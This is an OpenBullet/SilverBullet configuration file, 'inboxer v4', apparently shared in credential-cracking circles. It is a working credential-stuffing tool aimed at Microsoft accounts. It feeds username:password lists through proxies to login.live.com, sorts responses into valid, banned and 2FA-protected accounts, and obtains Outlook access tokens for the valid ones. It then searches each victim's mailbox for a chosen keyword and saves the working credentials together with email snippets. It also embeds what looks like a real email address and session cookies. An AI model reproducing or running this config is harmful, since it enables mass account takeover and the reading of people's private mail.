[SETTINGS]
{
  "Name": "inboxer v4",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2025-10-18T18:06:16.3356855+03:30",
  "AdditionalInfo": "https://t.me/poohscloudv2",
  "RequiredPlugins": [],
  "Author": "@callmepooh",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "enter keyword",
      "VariableName": "kir",
      "Id": 1310604777
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "inboxer v4",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Constant "<kir>" -> VAR "kw" 

FUNCTION Constant "<USER>" -> VAR "US" 

FUNCTION Constant "<PASS>" -> VAR "PS" 

REQUEST GET "https://login.live.com/" 
  
  HEADER "Host: login.live.com" 
  HEADER "Sec-Ch-Ua: \"Chromium\";v=\"139\", \"Not;A=Brand\";v=\"99\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Ch-Ua-Platform-Version: \"\"" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36,BosSH,ooTeR" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7;BosSHooTeR" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Priority: u=0, i" 
  HEADER "Connection: keep-alive" 

PARSE "<SOURCE>" LR "name=\\\"PPFT\\\" id=\\\"i0327\\\" value=\\\"" "\\" -> VAR "PPFT" 

PARSE "<SOURCE>" LR "opid%3D" "%" -> VAR "opid" 

PARSE "<SOURCE>" LR "contextid%3D" "%" -> VAR "contextid" 

PARSE "<COOKIES(uaid)>" LR "" "" -> VAR "uaid" 

PARSE "<COOKIES(MSPRequ)>" LR "" "" -> VAR "MSPRequ" 

PARSE "<MSPRequ>" LR "lt=" "&" -> VAR "bk" 

REQUEST POST "https://login.live.com/ppsecure/post.srf?client_id=0000000048170EF2&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf&response_type=token&scope=service%3A%3Aoutlook.office.com%3A%3AMBI_SSL&display=touch&username=ashleypetty%40outlook.com&contextid=2CCDB02DC526CA71&bk=1665024852&uaid=a5b22c26bc704002ac309462e8d061bb&pid=15216" 
  CONTENT "ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=&ctx=&hpgrequestid=&PPFT=-Div0Bt28gmyaHIfgDZtd5xvxnb7eeDAQOIjXkqyoF1ekQB6gLEqbSdzNE05qpz*B1Q82VKHs*RNXPa8xZG1TJS5HGKjFMxGcQ51PMU77ulAR%21JjAUTPM*Am5lkZU6Sa%21wIdI6zYnUI8VYQHQOCJLb*lRsaiV5MhGQieznZ%21EynMuuBHbBfLr28btqCBqLhzZXQ%24%24&PPSX=Pa&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&isRecoveryAttemptPost=0&i13=1&login=<US>&loginfmt=<US>&type=11&LoginOptions=1&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Origin: https://login.live.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://login.live.com/oauth20_authorize.srf?client_id=0000000048170EF2&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf&response_type=token&scope=service%3A%3Aoutlook.office.com%3A%3AMBI_SSL&uaid=a5b22c26bc704002ac309462e8d061bb&display=touch&username=ashleypetty%40outlook.com" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cookie: MSPRequ=id=N&lt=1716447264&co=1; uaid=a5b22c26bc704002ac309462e8d061bb; MSPOK=$uuid-13a3c70b-5026-45a1-84df-99ba880a29e1; OParams=11O.Dor!ityyROuDARitpqlq4!6jDuS3TVfYeLnCZLW20ulsO01Qdr0qXZuVyFO!VZa*Ode4!5h*e1lPmdhKFK*6ILTEw4ijD1A8v7hGiQ8bGpPjhK3yWl0EV*mAvY4JhtfpSjuRnVhijB9BBans*iz34S6vrrGPp33lLT587mBFUxPivMbVSru!YTfb0UOm1orslTW9OU0Swk!a!SLJBnMnMD*fzrT*NgzjbkQkWYIBGvKY5*IM5n8iVuQAaElo9KJHfzxnnEdy4RBOhlUdJTexq3ggPsaje8GeZfSN0C78uHTH4J8zXgXFtGqjM5lu!mjcBIF0Y5HqLO4okxAlSs3c0BoY7OOGYeYRpnqhZvgRgmdHSgcH8sLtn1ln2Hr8iGoiAQ$$; MicrosoftApplicationsTelemetryDeviceId=60aecd7a-f1a5-4753-b014-1f35eaee233c; ai_session=MJm/eRczdMHWqhQym5bUBG|1716447265233|1716447265233; MSFPC=GUID=8edf406d4669417a93d813d0d4a37bc1&HASH=8edf&LV=202405&V=4&LU=1716447268126" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 566" 

KEYCHECK 
  KEYCHAIN Failure AND 
    KEY "Your account or password is incorrect." 
    KEY "That Microsoft account doesn\\'t exist. Enter a different account" 
    KEY "Sign in to your Microsoft account" 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Failure OR 
    KEY "timed out" 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "ANON" 
    KEY "<COOKIES>" Contains "WLSSC" 
    KEY "<ADDRESS>" Contains "https://login.live.com/oauth20_desktop.srf?" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Email/Confirm?mkt" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/cancel?mkt=" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/Abuse?mkt=" 

KEYCHECK 
  KEYCHAIN Failure AND 
    KEY "Sign in to your Microsoft account" 
  KEYCHAIN Ban OR 
    KEY ",AC:null,urlFedConvertRename" 
  KEYCHAIN Success OR 
    KEY "<COOKIES>" Contains "ANON" 
    KEY "<COOKIES>" Contains "WLSSC" 
    KEY "<ADDRESS>" Contains "https://login.live.com/oauth20_desktop.srf?" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "account.live.com/recover?mkt" 
    KEY "recover?mkt" 
    KEY "account.live.com/identity/confirm?mkt" 

PARSE "<COOKIES(MSPCID)>" LR "" "" -> VAR "CI" 

FUNCTION ToUppercase "<CI>" -> VAR "CID" 

PARSE "<ADDRESS>" LR "refresh_token=" "&" -> VAR "RTK" 

REQUEST POST "https://login.live.com/oauth20_token.srf" 
  CONTENT "grant_type=refresh_token&client_id=0000000048170EF2&scope=https%3A%2F%2Fsubstrate.office.com%2FUser-Internal.ReadWrite&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf&refresh_token=<RTK>&uaid=db28da170f2a4b85a26388d0a6cdbb6e" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "x-ms-sso-Ignore-SSO: 1" 
  HEADER "User-Agent: Outlook-Android/2.0" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 547" 
  HEADER "Host: login.live.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

PARSE "<SOURCE>" JSON "access_token" -> VAR "ATK" 

REQUEST POST "https://outlook.live.com/search/api/v2/query?n=124&cv=tNZ1DVP5NhDwG%2FDUCelaIu.124" 
  CONTENT "{\"Cvid\":\"7ef2720e-6e59-ee2b-a217-3a4f427ab0f7\",\"Scenario\":{\"Name\":\"owa.react\"},\"TimeZone\":\"Egypt Standard Time\",\"TextDecorations\":\"Off\",\"EntityRequests\":[{\"EntityType\":\"Conversation\",\"ContentSources\":[\"Exchange\"],\"Filter\":{\"Or\":[{\"Term\":{\"DistinguishedFolderName\":\"msgfolderroot\"}},{\"Term\":{\"DistinguishedFolderName\":\"DeletedItems\"}}]},\"From\":0,\"Query\":{\"QueryString\":\"<kw>\"},\"RefiningQueries\":null,\"Size\":25,\"Sort\":[{\"Field\":\"Score\",\"SortDirection\":\"Desc\",\"Count\":3},{\"Field\":\"Time\",\"SortDirection\":\"Desc\"}],\"EnableTopResults\":true,\"TopResultsCount\":3}],\"AnswerEntityRequests\":[{\"Query\":{\"QueryString\":\"<kw>\"},\"EntityTypes\":[\"Event\",\"File\"],\"From\":0,\"Size\":10,\"EnableAsyncResolution\":true}],\"QueryAlterationOptions\":{\"EnableSuggestion\":true,\"EnableAlteration\":true,\"SupportedRecourseDisplayTypes\":[\"Suggestion\",\"NoResultModification\",\"NoResultFolderRefinerModification\",\"NoRequeryModification\",\"Modification\"]},\"LogicalId\":\"446c567a-02d9-b739-b9ca-616e0d45905c\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Outlook-Android/2.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "ForceSync: false" 
  HEADER "Authorization: Bearer <ATK>" 
  HEADER "X-AnchorMailbox: CID:<CID>" 
  HEADER "Host: substrate.office.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

PARSE "<SOURCE>" JSON "Total" -> VAR "total1" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<total1>" Contains "0" 
    KEY "<total1>" LessThanOrEqual "0" 
  KEYCHAIN Success OR 
    KEY "<total1>" GreaterThan "0" 

FUNCTION Constant "total <kw> : <total1>" -> CAP "total ?" 

PARSE "<SOURCE>" LR "\"HitHighlightedSummary\":\"" "\"" -> VAR "lastms2" 

PARSE "<SOURCE>" LR "\"LastDeliveryTime\":\"" "T" CreateEmpty=FALSE -> CAP "LAST EMAIL DATE" 

FUNCTION Replace "\\n" "" "<lastms2>" -> VAR "lastms1" 

FUNCTION Replace "\\r" "" "<lastms1>" -> CAP "lastmsg" 

FUNCTION Constant "pooh" -> CAP "config by" 

UTILITY Folder "inboxerhits" Create 

FUNCTION CurrentYear -> VAR "50" 

FUNCTION Replace "20" "" "<50>" -> VAR "1" 

FUNCTION CurrentMonth -> VAR "2" 

FUNCTION CurrentDay -> VAR "3" 

FUNCTION Constant "[<3>.<2>.<1>] result" -> VAR "date" 

UTILITY Folder "inboxerhits\\<date>" Create 

UTILITY File "inboxerhits\\<date>\\validmails.txt" AppendLines "<USER>:<PASS>" 

UTILITY File "<kw>.txt" AppendLines "<USER>:<PASS> | total ? = <total ?> | LAST EMAIL DATE = <LAST EMAIL DATE> | lastms = <lastms>" 

